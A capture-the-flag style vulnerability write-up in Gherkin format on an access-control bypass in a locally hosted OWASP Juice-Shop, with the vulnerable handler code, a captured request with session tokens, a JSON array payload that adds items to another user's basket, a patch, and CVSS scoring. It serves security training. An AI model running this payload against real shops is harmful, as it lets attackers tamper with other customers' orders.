## Version 1.4.2
## language: en

Feature:
  TOE:
    Juice-Shop
  Category:
    Broken Access Control
  Location:
    /api/BasketItems/ - basketId (Parameter)
  CWE:
    CWE-639: Authorization Bypass Through User-Controlled Key
  Rule:
    REQ.096 Definir privilegios requeridos de usuario
  Goal:
    Add a product to another users basket
  Recommendation:
    Implement proper access control

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running Juice-Shop in a docker container at
    """
    http://localhost:8000/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/
    Then I can navigate the site

  Scenario: Static detection
  Dev environment
    Given I see the code at "package.json"
    """
    ...
    06  module.exports = function addBasketItem () {
    07    return (req, res, next) => {
    08      var result = utils.parseJsonCustom(req.rawBody)
    09      var productIds = []
    10      var basketIds = []
    11      var quantities = []
    12
    13      for (var i = 0; i < result.length; i++) {
    14        if (result[i].key === 'ProductId') {
    15          productIds.push(result[i].value)
    16        } else if (result[i].key === 'BasketId') {
    17          basketIds.push(result[i].value)
    18        } else if (result[i].key === 'quantity') {
    19          quantities.push(result[i].value)
    20        }
    21      }
    22
    23      const user = insecurity.authenticatedUsers.from(req)
    24      if (user && basketIds[0] && basketIds[0] !== 'undefined' && user.bid
    != basketIds[0]) { // eslint-disable-line eqeqeq
    25        res.status(401).send('{\'error\' : \'Invalid BasketId\'}')
    26      } else {
    27        const basketItem = {
    28          ProductId: productIds[productIds.length - 1],
    29          BasketId: basketIds[basketIds.length - 1],
    30          quantity: quantities[quantities.length - 1]
    31        }
    32
    33        if (utils.notSolved(challenges.basketManipulateChallenge)) {
    34          if (user && basketItem.BasketId && basketItem.BasketId !== 'unde
    fined' && user.bid != basketItem.BasketId) { // eslint-disable-line eqeqeq
    35            utils.solve(challenges.basketManipulateChallenge)
    36          }
    37        }
    38
    39        const basketItemInstance = models.BasketItem.build(basketItem)
    40        basketItemInstance.save().then((basketItem) => {
    41          basketItem = {
    42            status: 'success',
    43            data: basketItem
    44          }
    45          res.json(basketItem)
    46        }).catch(error => {
    47          next(error)
    48        })
    49      }
    50    }
    51  }
    ...
    """
    Then I see it only checks that the basketId corresponds to user in one elmnt

  Scenario: Dynamic detection
  Modifying request values
    Given I intercept a request to add a product to basket with Burp
    """
    POST /api/BasketItems/ HTTP/1.1
    Host: localhost:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/
    66.0
    Accept: application/json, text/plain, */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8000/
    Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzd
    WNjZXNzIiwiZGF0YSI6eyJpZCI6MTUsInVzZXJuYW1lIjoiIiwiZW1haWwiOiJhQGIuY29tIiwic
    GFzc3dvcmQiOiIzYWJmMDBmYTYxYmZhZTJmZmY5MTMzMzc1ZTE0MjQxNiIsImlzQWRtaW4iOmZhb
    HNlLCJsYXN0TG9naW5JcCI6IjAuMC4wLjAiLCJwcm9maWxlSW1hZ2UiOiJkZWZhdWx0LnN2ZyIsI
    mNyZWF0ZWRBdCI6IjIwMTktMDItMDEgMTM6MjA6MDcuODU2ICswMDowMCIsInVwZGF0ZWRBdCI6I
    jIwMTktMDItMDEgMTM6MjA6MDcuODU2ICswMDowMCJ9LCJpYXQiOjE1NDkwMjcyMTYsImV4cCI6M
    TU0OTA0NTIxNn0.fC1w7TqHqMP2st3WN_3M0ykfSBZSQF2BSARgcmdriG-9PH2EtlpMz2AlC8-85
    qaukgZ5fs3g8E5S4ewYycHNQmzUGX9k-6EWdxBDC15ucED31yfinu68qsBjSeTP3y_38r8pzueu8
    bEVFoeeLyVs5USm1o2kISqWNz6m92Wg8oE
    X-User-Email: aa@b.com
    Content-Type: application/json
    Content-Length: 92
    Connection: close
    Cookie: cookieconsent_status=dismiss; continueCode=Mxl9Om3NR6bJBAJvHvhxcQsXi
    KSXukcVu8hoDsJ5IQoTlzAyWVZXQzL7rKva; io=ZSw-KysctUX0zaLQAAAz; token=eyJhbGci
    OiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MTU
    sInVzZXJuYW1lIjoiIiwiZW1haWwiOiJhQGIuY29tIiwicGFzc3dvcmQiOiIzYWJmMDBmYTYxYmZ
    hZTJmZmY5MTMzMzc1ZTE0MjQxNiIsImlzQWRtaW4iOmZhbHNlLCJsYXN0TG9naW5JcCI6IjAuMC4
    wLjAiLCJwcm9maWxlSW1hZ2UiOiJkZWZhdWx0LnN2ZyIsImNyZWF0ZWRBdCI6IjIwMTktMDItMDE
    gMTM6MjA6MDcuODU2ICswMDowMCIsInVwZGF0ZWRBdCI6IjIwMTktMDItMDEgMTM6MjA6MDcuODU
    2ICswMDowMCJ9LCJpYXQiOjE1NDkwMjcyMTYsImV4cCI6MTU0OTA0NTIxNn0.fC1w7TqHqMP2st3
    WN_3M0ykfSBZSQF2BSARgcmdriG-9PH2EtlpMz2AlC8-85qaukgZ5fs3g8E5S4ewYycHNQmzUGX9
    k-6EWdxBDC15ucED31yfinu68qsBjSeTP3y_38r8pzueu8bEVFoeeLyVs5USm1o2kISqWNz6m92W
    g8oE

    {"ProductId":22,"BasketId":"4","quantity":5}
    """
    Then I add brackets to make the request object a collection
    """
    ...
    [{"ProductId":22,"BasketId":"4","quantity":5}]
    """
    And still get a success response
    """
    ...
    {"status":"success","data":{"id":14,"ProductId":23,"BasketId":"3","quantity"
    :5,"updatedAt":"2019-02-01T13:56:23.087Z","createdAt":"2019-02-01T13:56:23.0
    87Z"}}
    """
    Then I add a new object with a different basketId
    """
    ...
    [{"ProductId":22,"BasketId":"4","quantity":5}, {"ProductId":22,"BasketId":"3
    ","quantity":5}]
    """
    And get a success response for the second element
    """
    ...
    {"status":"success","data":{"id":15,"ProductId":29,"BasketId":"3","quantity"
    :5,"updatedAt":"2019-02-01T15:09:59.462Z","createdAt":"2019-02-01T15:09:59.4
    62Z"}}
    """
    Then I have added a product to another users basket

  Scenario: Exploitation
  Using leaked info
    Given I know I can modify other user's baskets
    Then I can iterate through ids adding my product to their basket
    Then when they check out, I recieve thousands of orders

  Scenario: Remediation
  Access control
    Given I patch the code like this
    """
    ...
    06  module.exports = function addBasketItem () {
    07    return (req, res, next) => {
    08      var result = utils.parseJsonCustom(req.rawBody)
    09      var productIds = []
    10      var basketIds = []
    11      var quantities = []
    12
    13      for (var i = 0; i < 1; i++) {
    14        if (result[i].key === 'ProductId') {
    15          productIds.push(result[i].value)
    16        } else if (result[i].key === 'BasketId') {
    17          basketIds.push(result[i].value)
    18        } else if (result[i].key === 'quantity') {
    19          quantities.push(result[i].value)
    20        }
    21      }
    22
    23      const user = insecurity.authenticatedUsers.from(req)
    24      if (user && basketIds[0] && basketIds[0] !== 'undefined' && user.bid
    != basketIds[0]) { // eslint-disable-line eqeqeq
    25        res.status(401).send('{\'error\' : \'Invalid BasketId\'}')
    26      } else {
    27        const basketItem = {
    28          ProductId: productIds[productIds.length - 1],
    29          BasketId: basketIds[basketIds.length - 1],
    30          quantity: quantities[quantities.length - 1]
    31        }
    32
    33        if (utils.notSolved(challenges.basketManipulateChallenge)) {
    34          if (user && basketItem.BasketId && basketItem.BasketId !== 'unde
    fined' && user.bid != basketItem.BasketId) { // eslint-disable-line eqeqeq
    35            utils.solve(challenges.basketManipulateChallenge)
    36          }
    37        }
    38
    39        const basketItemInstance = models.BasketItem.build(basketItem)
    40        basketItemInstance.save().then((basketItem) => {
    41          basketItem = {
    42            status: 'success',
    43            data: basketItem
    44          }
    45          res.json(basketItem)
    46        }).catch(error => {
    47          next(error)
    48        })
    49      }
    50    }
    51  }
    ...
    """
    Then only the first element is validated and saved

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.1/10 (High) - AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.6/10 (High) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    6.6/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    0284-idor-basket
      Given I can see the data from any basketId
      Then I can check to which user corresponds each basket
      And I can modify a target user's basket specifically
